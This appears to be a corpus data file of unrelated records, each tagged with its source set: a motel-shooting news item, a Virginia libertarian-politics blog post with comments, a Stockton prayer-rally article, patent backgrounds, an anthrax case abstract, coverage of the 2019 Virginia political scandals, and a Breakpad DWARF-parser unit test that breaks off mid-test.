The incident happened just after midnight. Lopes told authorities he was asleep with his wife in their room when they heard a loud disturbance outside. Lopes retrieved his handgun from his bedside table and went to the door to investigate. But before he could peer through the peephole, the locked door flung open and Dobson fell through it, knocking Lopes against the wall.
As Dobson staggered in the direction of the bed, Lopes fired one shot, striking Dobson in the shoulder, according to the release. He then turned on the lights to find Dobson on the floor.
Dobson and three friends had been out to dinner and consumed “significant qualities of alcohol,” according to the release. When they returned to Ocean Crest, they engaged in horseplay outside of Lopes’ room. When Dobson leaned into the door, an unidentified friend shoved him through it, hard enough to break the lock.
“Mr. Lopes could not have known whether Mr. Dodson intended to enter the motel room or what his intentions may have been upon entry and therefore, Mr. Lopes’ use of deadly force was entirely reasonable under the circumstances,” David’s release said.
Dobson remains in the hospital in stable condition.
Reporter Hunter Ingram can be reached at 910-343-2327 or Hunter.Ingram@StarNewsOnline.com.
|
{
"pile_set_name": "OpenWebText2"
}
|
I am an evil giraffe. Who no longer blogs about politics.
Come, I will conceal nothing from you: while I am friendly to a lot of libertarian ideas, I am not hard-shelled about it. I am no Lsyander Spooner or Benjamin Tucker. But I do know enough about the subject to know that, say, I was name-dropping some of the old-time thinkers there that the modern anarcho-capitalists like. In other words: I at least know what a modern Libertarian looks like.
I can only imagine, therefore, that the better-informed voters in Virginia have been somewhat perplexed by Robert Sarvis, for in recent weeks he appears to have been doing his level best to give the impression that his party label is incidental. In a recent Reason interview, Sarvis explained that he was “not into the whole Austrian type, strongly libertarian economics,” preferring “more mainstream economics” instead. The candidate expanded on this during an oddly defensive interview with MSNBC’s Chuck Todd, in which he seemed put off not so much by “strongly libertarian economics” as by libertarian economics per se. As governor, Sarvis told Todd, he would be hesitant to cut taxes, unsure as to how he might “reduce spending,” and open to indulging the largest piece of federal social policy since 1965 by expanding Virginia’s Medicaid program. I am generally a critic of the tendency of small-government types to try to purge their ranks of those deemed sufficiently impure, but I must confess that this interview left even me wondering whether Sarvis is in need of a dictionary.
Charles goes on to note that Sarvis favors putting chips in people’s cars so that they can be taxed for their mileage. Let me repeat that: ROBERT SARVIS WANTS TO PUT A CHIP IN YOUR CAR SO THAT YOU CAN BE TAXED FOR YOUR MILEAGE. Let’s switch now to Ben Domenech for that:
That last position is particularly nonsensical to me: a VMT, which generally requires a government GPS to be installed in your car to track your miles driven, is about the most anti-libertarian transportation tax you can think of – even those radical libertarians at Brookings think it’s a bad idea, and it was one of the potential bad ideas in McDonnell’s transportation plan that got killed over it: “The biggest concern may be privacy. Eighty-six percent of area commuters would oppose having a GPS device installed in their car to track their miles, according to a study by the Council of Governments Transportation Planning Board released last week.” Big government technocrats may like such steps, but I cannot think of a single coherent libertarian case for such an invasion of individual privacy.
The bottom line is that if you live in Virginia, you have a choice: Republican Ken Cuccinelli, who actually does want to reduce the government’s influence over the state economy, or Democrat Terry McAuliffe, who does not. Voting for Robert Sarvis merely helps McAuliffe win, and – this may be more important – you won’t even get to feel pro-liberty when you do it. Unless, of course, you think that the feds putting a chip in your car to track your movements mileage is somehow pro-liberty.
I mean, how the heck can even take the Libertarian Party of Virginia seriously if they run candidates who want the feds to put chips in people’s cars?
Simple. The Libertarians started as a bunch of disgruntled Republicans. As is so often these sorts of “divorces”, the fight against the Republicans has become more important then their fight for freedom. Plenty of time (I believe the thinking goes) to Return the country to a Constitutional Republic once the Republicans have been destroyed…..
Just addressing the GPS-in-the-car thing, the alleged “Libertarian” argument is that it’s pay-per-use. I think it is a stupid idea, but I must point out that if you carry a cell phone with you, “they” already have this data, and if you have OnStar, they could already *do* this…
.
There’s also an outfit in Cali that make.a device that will read just the odometer and upload it via onboard diagnostics, but … since it’s cellular, still trackable.
.
Still a bad idea.
.
Mew
Also Libertarians keep on giving “Cuccinelli is the anti-thesis of Liberty” but have yet to back it with anything other then T-Mac talking points.
Conservatives can actually point to some of Ken’s more “libertarian” votes.
Sarvis on the other hand has no voting record to speak of and because he’s the LP nominee he’s been allowed to pose as a Libertarian unchallenged.
LP should realize that the GOP will start questioning their nominee’s sincerity from now on. Especially when the nominee is so blatantly obvious stalking horse.
Sarvis has done nothing in this campaign but scream at Ken for being a devout Catholic.
Not dumber so much, as the key difference between the two parties. Democrats go for bigger, building the Hive. Republicans do not take orders well, and are annoyed by mobs as a rule, as so are much more likely to form a “Third Party” (Yes, I know we have almost a dozen of them at this point), or escape into the mountains (Where the Democrats track them down at gunpoint, sigh, because Everyone must play their game).
Prediction: I’ll bet we’ll find out after the election that the Democrats have secretly been boosting Sarvis’ campaign. They learned how effective a spoiler candidate can be in 2008, when Al Franken won because an independent candidate siphoned away conservative votes from the Republican candidate. And Todd Akin was actually chosen by Democrat crossover voters as the Republican candidate who would be easiest for Claire McCaskill to beat.
|
{
"pile_set_name": "Pile-CC"
}
|
Check out our new site Makeup Addiction
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
add your own caption
wash your pillowcases often it cuts down on acne significantly.
|
{
"pile_set_name": "OpenWebText2"
}
|
For the third year in a row, she and Anita Moore are organizing a communitywide time of public prayer - and calling on Stockton clergy to join them.
Bass points to the sharp drop in homicides since 2012 as evidence of divine intervention in the city's problems.
"My whole thing is I have had nephews killed in Stockton," she said. "I've been talking to their mothers. I've been there to counsel them.
"My kids' father was killed in front of me in '95. I want to stop the killing before it happens. I want the police to join in. People are scared to call the police, and I want that to change. I want us to come together as one."
Once again, Bass, Moore and others are meeting at Dr. Martin Luther King Jr. Plaza for prayer. They are gathering at 10 a.m. Saturday at the King statue facing El Dorado Street.
Bass, 41, is a member of Corinthian Missionary Baptist Church on Fifth Street. Three years ago, she created the organization Mothers Making a Difference, or MMAD, with the idea of pulling moms together in a stand against violence.She was joined by Moore, who founded a group known as Communities Standing Together With Friends 'n' Families at the same time.
The theme of this year's prayer gathering, Bass said, fits the goals of both their organizations. It is "the community coming together in unity with prayer."
Mayor Anthony Silva and representatives of the police department have been invited.
"We want to pray for our city," Bass said. "We need to pray for Stockton. We want this even to be as big as possible."
Bass also has a dream of a day sometime in the future when all the churches in Stockton take a Sunday off from regular worship services and come together "as one" at Weber Point Events Center.
|
{
"pile_set_name": "Pile-CC"
}
|
A cache is a component that transparently stores data so that future requests for that data can be served faster. The data that is stored within a cache might be values that have been computed earlier or duplicates of original values that are stored elsewhere. If requested data is contained in the cache (i.e., cache hit), this request can be served by simply reading the cache, which is comparatively faster. Otherwise (i.e., cache miss), the data must be fetched from its original storage location, which is comparatively slower. Prefetching is the operation of loading data or instructions in cache in anticipation of their need. Thus, the greater the number of requests that can be served from the cache, the faster the overall system performance.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Virginia lieutenant governor wants accusations investigated
FILE - In this Dec. 18, 2017 file photo, from left, Lt. Governor-elect Justin Fairfax, Attorney General-elect Mark Herring and Governor-elect Ralph Northam listen as Virginia Governor Terry McAuliffe addresses a joint meeting of the House and Senate money committees at the Pocahontas Building in Richmond, Va. With Virginia's top three elected officials engulfed in scandal, fellow Democrats were rendered practically speechless, uncertain of how to thread their way through the racial and sexual allegations and their tangled political implications.Bob Brown / AP
RICHMOND, Va. — Virginia’s embattled lieutenant governor on Saturday called for authorities, including the FBI, to investigate sexual assault allegations made against him while defying widespread calls for his resignation with a plea for “space in this moment for due process.”
Democratic Lt. Gov. Justin Fairfax issued a statement repeating his strong denials that he had ever sexually assaulted anyone and made clear he does not intend to immediately resign, despite having lost almost his entire base of support.
Meanwhile, Gov. Ralph Northam pledged to work at healing the state’s racial divide and made his first official appearance a week after a racist photo on his 1984 medical school yearbook page surfaced and he acknowledged wearing blackface in the 1980s. Northam has also defied calls from practically his entire party to step down.
Saturday capped an astonishing week in Virginia politics that saw all three of the state’s top elected officials embroiled in potentially career-ending scandals, and the state Democratic Party on the verge of collapse.
Two women have accused Lt. Gov. Justin Fairfax of sexual assault. After the second allegation was made Friday, Fairfax — the second African-American to ever win statewide office– was barraged with demands to step down from top Democrats, including a number of presidential hopefuls and most of Virginia’s congressional delegation.
Northam –now a year into his four-year term — has told his top staff he’s staying in office and said he wants to focus the rest of his term as governor on taking concrete steps toward increasing racial equality.
In his first interview since the scandal erupted, a chastened Northam told The Washington Post on Saturday that the uproar has pushed him to confront the state’s deep and lingering divisions over race, as well as his own insensitivity. But he said that reflection has convinced him that, by remaining in office, he can work to resolve them.
“It’s obvious from what happened this week that we still have a lot of work to do,” Northam said in the interview, conducted at the Executive Mansion. “There are still some very deep wounds in Virginia, and especially in the area of equity.”
Northam said he planned to focus on addressing issues stemming from inequality, including improving access to health care, housing, and transportation. He also repeated his contention that he is not pictured in the photo on his yearbook page that shows someone in blackface standing alongside someone in a Ku Klux Klan hood and robe. But he could not explain how the photo wound up there, or why he initially had taken responsibility for it.
“I overreacted,” he said. “If I had it to do over again, I would step back and take a deep breath.”
On Saturday, Northam made his first official public appearance since he denied being in the photo, attending the funeral for a state trooper killed in a shootout. But he made no public comments upon arriving in Chilhowie, four hours west of the tumult in Richmond.
The lieutenant governor did not make any public appearances Saturday and released his statement late in the day, after Republican state House Speaker Kirk Cox and the Democratic Party of Virginia joined a chorus of other calls for Fairfax to resign.
Two women have made allegations against Fairfaxe. A lawyer for Meredith Watson, 39, said in a statement that Fairfax raped Watson 19 years ago while they were students at Duke University.
Vanessa Tyson, a California college professor, said Fairfax forced her to perform oral sex on him at a Boston hotel in 2004.
Fairfax has denied both allegations and on Saturday asked that “no one rush to judgment.”
“Our American values don’t just work when it’s convenient — they must be applied at the most difficult of times,” he said.
Since the two allegations were made, many top Democrats running for president in 2020 have called for Fairfax’s resignation, including Sens. Cory Booker of New Jersey, Kirsten Gillibrand of New York, and Elizabeth Warren of Massachusetts.
Virginia’s Democratic congressional delegation was split.
Party elders Sen. Mark Warner and Rep. Bobby Scott said Fairfax should resign if the allegations against him were true.
Other congressional Democrats made unqualified calls for Fairfax to resign.
The Virginia Black Legislative Caucus joined calls for Fairfax’s departure. And a Democratic member of the state House, Del. Patrick Hope, said he intends to introduce articles of impeachment against Fairfax on Monday if Fairfax hasn’t left by then.
Hope is not a powerful figure in the House and there’s little sign there’s a broad appetite for impeachment with lawmakers set to finish this year’s legislative session by the end of the month.
Attorneys for Watson and Tyson released separate statements Saturday, saying their clients would be willing to testify at an impeachment hearing.
“Ms. Watson stands ready, although it will be painful, to tell the Virginia Legislature what Mr. Fairfax did to her when she was 20 years old,” a statement released by Watson’s attorney said.
A statement released by Tyson’s attorneys said: “We are confident that once the Virginia legislature hears Dr. Tyson’s harrowing account of this sexual assault, the testimony of many corroborating witnesses, and evidence of his attempts to mislead the public about The Washington Post’s decision not to run a story in 2018, it will conclude that he lacks the character, fitness and credibility to serve in any capacity.”
If Fairfax were to leave, it’s unclear who could replace him. Northam may try to appoint a Democrat, while Republicans could mount a legal challenge with the goal of having Sen. Steve Newman, the Senate’s pro tem, serve as both a voting senator and temporary lieutenant governor.
The tumult in Virginia began Feb. 1, with the discovery of the photo on Northam’s yearbook profile page.
Northam at first admitted he was in the picture, then denied it a day later, but acknowledged he wore blackface to look like Michael Jackson for a dance contest in 1984.
Attorney General Mark Herring has since acknowledged wearing blackface at a college party in 1980. Herring — who would become governor if both Northam and Fairfax resign — had previously called on Northam to resign and came forward after rumours about the existence of a blackface photo of him began circulating at the Capitol.
Although the Democratic Party has taken almost a zero-tolerance approach to misconduct among its members in this #MeToo era, a housecleaning in Virginia could be costly to them: If all three Democrats resigned, Republican Cox would become governor.
Democrats are also despondent about what the scandals have done to their chances of flipping control of the General Assembly. All 140 legislative seats will be up for grabs in November and Democrats had previously been hopeful that voter antipathy toward President Donald Trump would help them cement Virginia’s status as a blue state. Now many fret their current crisis in leadership will not only cost them chances of winning GOP-held seats, but cost them several currently held by Democrats.
Justin Trudeau’s Liberal government has released its last budget before the fall federal election
This Week's Flyers
Comments
Postmedia is pleased to bring you a new commenting experience. We are committed to maintaining a lively but civil forum for discussion and encourage all readers to share their views on our articles. We ask you to keep your comments relevant and respectful. Visit our community guidelines for more information.
|
{
"pile_set_name": "Pile-CC"
}
|
The present embodiments relate in general to power semiconductor technology, and more particularly to accumulation-mode and enhancement-mode trenched-gate field effect transistors (FETs) and their methods of manufacture.
The key component in power electronic applications is the solid state switch. From ignition control in automotive applications to battery-operated consumer electronic devices, to power converters in industrial applications, there is a need for a power switch that optimally meets the demands of the particular application. Solid state switches including, for example, the power metal-oxide-semiconductor field effect transistor (power MOSFET), the insulated-gate bipolar transistor (IGBT) and various types of thyristors have continued to evolve to meet this demand. In the case of the power MOSFET, for example, double-diffused structures (DMOS) with lateral channel (e.g., U.S. Pat. No. 4,682,405 to Blanchard et al.), trenched gate structures (e.g., U.S. Pat. No. 6,429,481 to Mo et al.), and various techniques for charge balancing in the transistor drift region (e.g., U.S. Pat. No. 4,941,026 to Temple, U.S. Pat. No. 5,216,275 to Chen, and U.S. Pat. No. 6,081,009 to Neilson) have been developed, among many other technologies, to address the differing and often competing performance requirements.
Some of the defining performance characteristics for the power switch are its on-resistance, breakdown voltage and switching speed. Depending on the requirements of a particular application, a different emphasis is placed on each of these performance criteria. For example, for power applications greater than about 300-400 volts, the IGBT exhibits an inherently lower on-resistance as compared to the power MOSFET, but its switching speed is lower due to its slower turn off characteristics. Therefore, for applications greater than 400 volts with low switching frequencies requiring low on-resistance, the IGBT is the preferred switch while the power MOSFET is often the device of choice for relatively higher frequency applications. If the frequency requirements of a given application dictate the type of switch that is used, the voltage requirements determine the structural makeup of the particular switch. For example, in the case of the power MOSFET, because of the proportional relationship between the drain-to-source on-resistance RDSon and the breakdown voltage, improving the voltage performance of the transistor while maintaining a low RDSon poses a challenge. Various charge balancing structures in the transistor drift region have been developed to address this challenge with differing degrees of success.
Two varieties of field effect transistors are accumulation mode FET and enhancement mode FET. In conventional accumulation FETs because no inversion channel is formed, the channel resistance is eliminated thus improving the transistor power handling capability and its efficiency. Further, with no pn body diode, the losses in synchronous rectification circuits attributable to the pn diode are reduced. A drawback of conventional accumulation transistors is that the drift region needs to be lightly doped to support a high enough reverse bias voltage. However, a lightly doped drift region results in a higher on-resistance and lower efficiency. Similarly, in enhancement mode FETs, improving the transistor break down voltage often comes at the price of higher on-resistance or vice versa.
Device performance parameters are also impacted by the fabrication process. Attempts have been made to address some of these challenges by developing a variety of improved processing techniques. Whether it is in ultra-portable consumer electronic devices or routers and hubs in communication systems, the varieties of applications for the power switch continue to grow with the expansion of the electronic industry. The power switch therefore remains a semiconductor device with high development potential.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
as fresh samples for isolation of normal organoids or breast stem cells. The pathology core will provide normal breast tissue for stem cell studies (Polyak) and for 3-D organoid cultures (Brugge). Freshtumor samples will be provided to establish primary tumor xenograftsin mice Weinberg). In addition, Dr. Richardson will participate in the pathologic comparisons, both molecular and histology, between the parent human tumors and the resultant xenografts. Gene expression array data obtained from human tumors will be used in system interaction analyses of BRCA1 relatedpathways (Livingston). Dr. Richardson will provide both tissue and scientific expertise to analyzefrozen tumor specimens and paraffin tissue microarrays for the expression of BRCA1gene products, including IRIS (Livingston). RELEVANCE (See instructions): Research using actual human breast tissue and breast tumor material will hopefully provide the most relevant answers to pathogenesis and tumor behavior of breast cancer in women. PROJECT/
|
{
"pile_set_name": "NIH ExPorter"
}
|
[The return of anthrax. From bioterrorism to the zoonotic cluster of Sciacca district].
Anthrax is a disease caused by Bacillus anthracis which affects herbivorous animals. Humans acquire the disease incidentally by exposure to infected animals, animal products or spores on soil. The infection is still endemic in many regions in developing countries. In Italy animal clusters are very rare and human cases are exceptional. Bacillus anthrax is also a potential source for acts of bioterrorism. In the natural human infection, cutaneous anthrax is the most widespread, while the other two, pulmonary and gastrointestinal anthrax, are very rare forms. We describe the first case of human anthrax occurring in western Sicily in the last twenty years. The cutaneous lesion healed without significant scarring after antibiotic treatment with tigecycline, rifampin and ciprofloxacin. Following our diagnosis, a cluster of bovine anthrax was detected in the district of Sciacca, causing the death of 13 animals. A larger outbreak was avoided by the vaccination of over 5000 herbivores.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
THE NEW SINGLE OUT NOW
|
{
"pile_set_name": "OpenWebText2"
}
|
// Copyright (c) 2012, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// Original author: Jim Blandy <jimb@mozilla.com> <jimb@red-bean.com>
// dwarf2reader_die_unittest.cc: Unit tests for dwarf2reader::CompilationUnit
#include <stdint.h>
#include <stdlib.h>
#include <iostream>
#include <string>
#include <vector>
#include "breakpad_googletest_includes.h"
#include "common/dwarf/bytereader-inl.h"
#include "common/dwarf/dwarf2reader_test_common.h"
#include "common/dwarf/dwarf2reader.h"
#include "common/using_std_string.h"
#include "google_breakpad/common/breakpad_types.h"
using google_breakpad::test_assembler::Endianness;
using google_breakpad::test_assembler::Label;
using google_breakpad::test_assembler::Section;
using google_breakpad::test_assembler::kBigEndian;
using google_breakpad::test_assembler::kLittleEndian;
using dwarf2reader::ByteReader;
using dwarf2reader::CompilationUnit;
using dwarf2reader::Dwarf2Handler;
using dwarf2reader::DwarfAttribute;
using dwarf2reader::DwarfForm;
using dwarf2reader::DwarfHasChild;
using dwarf2reader::DwarfTag;
using dwarf2reader::ENDIANNESS_BIG;
using dwarf2reader::ENDIANNESS_LITTLE;
using dwarf2reader::SectionMap;
using std::vector;
using testing::InSequence;
using testing::Pointee;
using testing::Return;
using testing::Sequence;
using testing::Test;
using testing::TestWithParam;
using testing::_;
class MockDwarf2Handler: public Dwarf2Handler {
public:
MOCK_METHOD5(StartCompilationUnit, bool(uint64 offset, uint8 address_size,
uint8 offset_size, uint64 cu_length,
uint8 dwarf_version));
MOCK_METHOD2(StartDIE, bool(uint64 offset, enum DwarfTag tag));
MOCK_METHOD4(ProcessAttributeUnsigned, void(uint64 offset,
DwarfAttribute attr,
enum DwarfForm form,
uint64 data));
MOCK_METHOD4(ProcessAttributeSigned, void(uint64 offset,
enum DwarfAttribute attr,
enum DwarfForm form,
int64 data));
MOCK_METHOD4(ProcessAttributeReference, void(uint64 offset,
enum DwarfAttribute attr,
enum DwarfForm form,
uint64 data));
MOCK_METHOD5(ProcessAttributeBuffer, void(uint64 offset,
enum DwarfAttribute attr,
enum DwarfForm form,
const uint8_t *data,
uint64 len));
MOCK_METHOD4(ProcessAttributeString, void(uint64 offset,
enum DwarfAttribute attr,
enum DwarfForm form,
const string& data));
MOCK_METHOD4(ProcessAttributeSignature, void(uint64 offset,
DwarfAttribute attr,
enum DwarfForm form,
uint64 signature));
MOCK_METHOD1(EndDIE, void(uint64 offset));
};
struct DIEFixture {
DIEFixture() {
// Fix the initial offset of the .debug_info and .debug_abbrev sections.
info.start() = 0;
abbrevs.start() = 0;
// Default expectations for the data handler.
EXPECT_CALL(handler, StartCompilationUnit(_, _, _, _, _)).Times(0);
EXPECT_CALL(handler, StartDIE(_, _)).Times(0);
EXPECT_CALL(handler, ProcessAttributeUnsigned(_, _, _, _)).Times(0);
EXPECT_CALL(handler, ProcessAttributeSigned(_, _, _, _)).Times(0);
EXPECT_CALL(handler, ProcessAttributeReference(_, _, _, _)).Times(0);
EXPECT_CALL(handler, ProcessAttributeBuffer(_, _, _, _, _)).Times(0);
EXPECT_CALL(handler, ProcessAttributeString(_, _, _, _)).Times(0);
EXPECT_CALL(handler, EndDIE(_)).Times(0);
}
// Return a reference to a section map whose .debug_info section refers
// to |info|, and whose .debug_abbrev section refers to |abbrevs|. This
// function returns a reference to the same SectionMap each time; new
// calls wipe out maps established by earlier calls.
const SectionMap &MakeSectionMap() {
// Copy the sections' contents into strings that will live as long as
// the map itself.
assert(info.GetContents(&info_contents));
assert(abbrevs.GetContents(&abbrevs_contents));
section_map.clear();
section_map[".debug_info"].first
= reinterpret_cast<const uint8_t *>(info_contents.data());
section_map[".debug_info"].second = info_contents.size();
section_map[".debug_abbrev"].first
= reinterpret_cast<const uint8_t *>(abbrevs_contents.data());
section_map[".debug_abbrev"].second = abbrevs_contents.size();
return section_map;
}
TestCompilationUnit info;
TestAbbrevTable abbrevs;
MockDwarf2Handler handler;
string abbrevs_contents, info_contents;
SectionMap section_map;
};
struct DwarfHeaderParams {
DwarfHeaderParams(Endianness endianness, size_t format_size,
int version, size_t address_size)
: endianness(endianness), format_size(format_size),
version(version), address_size(address_size) { }
Endianness endianness;
size_t format_size; // 4-byte or 8-byte DWARF offsets
int version;
size_t address_size;
};
class DwarfHeader: public DIEFixture,
public TestWithParam<DwarfHeaderParams> { };
TEST_P(DwarfHeader, Header) {
Label abbrev_table = abbrevs.Here();
abbrevs.Abbrev(1, dwarf2reader::DW_TAG_compile_unit,
dwarf2reader::DW_children_yes)
.Attribute(dwarf2reader::DW_AT_name, dwarf2reader::DW_FORM_string)
.EndAbbrev()
.EndTable();
info.set_format_size(GetParam().format_size);
info.set_endianness(GetParam().endianness);
info.Header(GetParam().version, abbrev_table, GetParam().address_size)
.ULEB128(1) // DW_TAG_compile_unit, with children
.AppendCString("sam") // DW_AT_name, DW_FORM_string
.D8(0); // end of children
info.Finish();
{
InSequence s;
EXPECT_CALL(handler,
StartCompilationUnit(0, GetParam().address_size,
GetParam().format_size, _,
GetParam().version))
.WillOnce(Return(true));
EXPECT_CALL(handler, StartDIE(_, dwarf2reader::DW_TAG_compile_unit))
.WillOnce(Return(true));
EXPECT_CALL(handler, ProcessAttributeString(_, dwarf2reader::DW_AT_name,
dwarf2reader::DW_FORM_string,
"sam"))
.WillOnce(Return());
EXPECT_CALL(handler, EndDIE(_))
.WillOnce(Return());
}
ByteReader byte_reader(GetParam().endianness == kLittleEndian ?
ENDIANNESS_LITTLE : ENDIANNESS_BIG);
CompilationUnit parser("", MakeSectionMap(), 0, &byte_reader, &handler);
EXPECT_EQ(parser.Start(), info_contents.size());
}
INSTANTIATE_TEST_CASE_P(
HeaderVariants, DwarfHeader,
::testing::Values(DwarfHeaderParams(kLittleEndian, 4, 2, 4),
DwarfHeaderParams(kLittleEndian, 4, 2, 8),
DwarfHeaderParams(kLittleEndian, 4, 3, 4),
DwarfHeaderParams(kLittleEndian, 4, 3, 8),
DwarfHeaderParams(kLittleEndian, 4, 4, 4),
DwarfHeaderParams(kLittleEndian, 4, 4, 8),
DwarfHeaderParams(kLittleEndian, 8, 2, 4),
DwarfHeaderParams(kLittleEndian, 8, 2, 8),
DwarfHeaderParams(kLittleEndian, 8, 3, 4),
DwarfHeaderParams(kLittleEndian, 8, 3, 8),
DwarfHeaderParams(kLittleEndian, 8, 4, 4),
DwarfHeaderParams(kLittleEndian, 8, 4, 8),
DwarfHeaderParams(kBigEndian, 4, 2, 4),
DwarfHeaderParams(kBigEndian, 4, 2, 8),
DwarfHeaderParams(kBigEndian, 4, 3, 4),
DwarfHeaderParams(kBigEndian, 4, 3, 8),
DwarfHeaderParams(kBigEndian, 4, 4, 4),
DwarfHeaderParams(kBigEndian, 4, 4, 8),
DwarfHeaderParams(kBigEndian, 8, 2, 4),
DwarfHeaderParams(kBigEndian, 8, 2, 8),
DwarfHeaderParams(kBigEndian, 8, 3, 4),
DwarfHeaderParams(kBigEndian, 8, 3, 8),
DwarfHeaderParams(kBigEndian, 8, 4, 4),
DwarfHeaderParams(kBigEndian, 8, 4, 8)));
struct DwarfFormsFixture: public DIEFixture {
// Start a compilation unit, as directed by |params|, containing one
// childless DIE of the given tag, with one attribute of the given name
// and form. The 'info' fixture member is left just after the abbrev
// code, waiting for the attribute value to be appended.
void StartSingleAttributeDIE(const DwarfHeaderParams ¶ms,
DwarfTag tag, DwarfAttribute name,
DwarfForm form) {
// Create the abbreviation table.
Label abbrev_table = abbrevs.Here();
abbrevs.Abbrev(1, tag, dwarf2reader::DW_children_no)
.Attribute(name, form)
.EndAbbrev()
.EndTable();
// Create the compilation unit, up to the attribute value.
info.set_format_size(params.format_size);
info.set_endianness(params.endianness);
info.Header(params.version, abbrev_table, params.address_size)
.ULEB128(1); // abbrev code
}
// Set up handler to expect a compilation unit matching |params|,
// containing one childless DIE of the given tag, in the sequence s. Stop
// just before the expectations.
void ExpectBeginCompilationUnit(const DwarfHeaderParams ¶ms,
DwarfTag tag, uint64 offset=0) {
EXPECT_CALL(handler,
StartCompilationUnit(offset, params.address_size,
params.format_size, _,
params.version))
.InSequence(s)
.WillOnce(Return(true));
EXPECT_CALL(handler, StartDIE(_, tag))
.InSequence(s)
.WillOnce(Return(true));
}
void ExpectEndCompilationUnit() {
EXPECT_CALL(handler, EndDIE(_))
.InSequence(s)
.WillOnce(Return());
}
void ParseCompilationUnit(const DwarfHeaderParams ¶ms, uint64 offset=0) {
ByteReader byte_reader(params.endianness == kLittleEndian ?
ENDIANNESS_LITTLE : ENDIANNESS_BIG);
CompilationUnit parser("", MakeSectionMap(), offset, &byte_reader, &handler);
EXPECT_EQ(offset + parser.Start(), info_contents.size());
}
// The sequence to which the fixture's methods append expectations.
Sequence s;
};
struct DwarfForms: public DwarfFormsFixture,
public TestWithParam<DwarfHeaderParams> { };
TEST_P(DwarfForms, addr) {
StartSingleAttributeDIE(GetParam(), dwarf2reader::DW_TAG_compile_unit,
dwarf2reader::DW_AT_low_pc,
dwarf2reader::DW_FORM_addr);
uint64_t value;
if (GetParam().address_size == 4) {
value = 0xc8e9ffcc;
info.D32(value);
} else {
value = 0xe942517fc2768564ULL;
info.D64(value);
}
info.Finish();
ExpectBeginCompilationUnit(GetParam(), dwarf2reader::DW_TAG_compile_unit);
EXPECT_CALL(handler, ProcessAttributeUnsigned(_, dwarf2reader::DW_AT_low_pc,
dwarf2reader::DW_FORM_addr,
value))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, block2_empty) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x16e4d2f7,
(DwarfAttribute) 0xe52c4463,
dwarf2reader::DW_FORM_block2);
info.D16(0);
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x16e4d2f7);
EXPECT_CALL(handler, ProcessAttributeBuffer(_, (DwarfAttribute) 0xe52c4463,
dwarf2reader::DW_FORM_block2,
_, 0))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, block2) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x16e4d2f7,
(DwarfAttribute) 0xe52c4463,
dwarf2reader::DW_FORM_block2);
unsigned char data[258];
memset(data, '*', sizeof(data));
info.D16(sizeof(data))
.Append(data, sizeof(data));
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x16e4d2f7);
EXPECT_CALL(handler, ProcessAttributeBuffer(_, (DwarfAttribute) 0xe52c4463,
dwarf2reader::DW_FORM_block2,
Pointee('*'), 258))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, flag_present) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x3e449ac2,
(DwarfAttribute) 0x359d1972,
dwarf2reader::DW_FORM_flag_present);
// DW_FORM_flag_present occupies no space in the DIE.
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x3e449ac2);
EXPECT_CALL(handler,
ProcessAttributeUnsigned(_, (DwarfAttribute) 0x359d1972,
dwarf2reader::DW_FORM_flag_present,
1))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, sec_offset) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0x1d971689,
(DwarfAttribute) 0xa060bfd1,
dwarf2reader::DW_FORM_sec_offset);
uint64_t value;
if (GetParam().format_size == 4) {
value = 0xacc9c388;
info.D32(value);
} else {
value = 0xcffe5696ffe3ed0aULL;
info.D64(value);
}
info.Finish();
ExpectBeginCompilationUnit(GetParam(), (DwarfTag) 0x1d971689);
EXPECT_CALL(handler, ProcessAttributeUnsigned(_, (DwarfAttribute) 0xa060bfd1,
dwarf2reader::DW_FORM_sec_offset,
value))
.InSequence(s)
.WillOnce(Return());
ExpectEndCompilationUnit();
ParseCompilationUnit(GetParam());
}
TEST_P(DwarfForms, exprloc) {
StartSingleAttributeDIE(GetParam(), (DwarfTag) 0xb6d167bb,
(DwarfAttribute) 0xba3ae5cb,
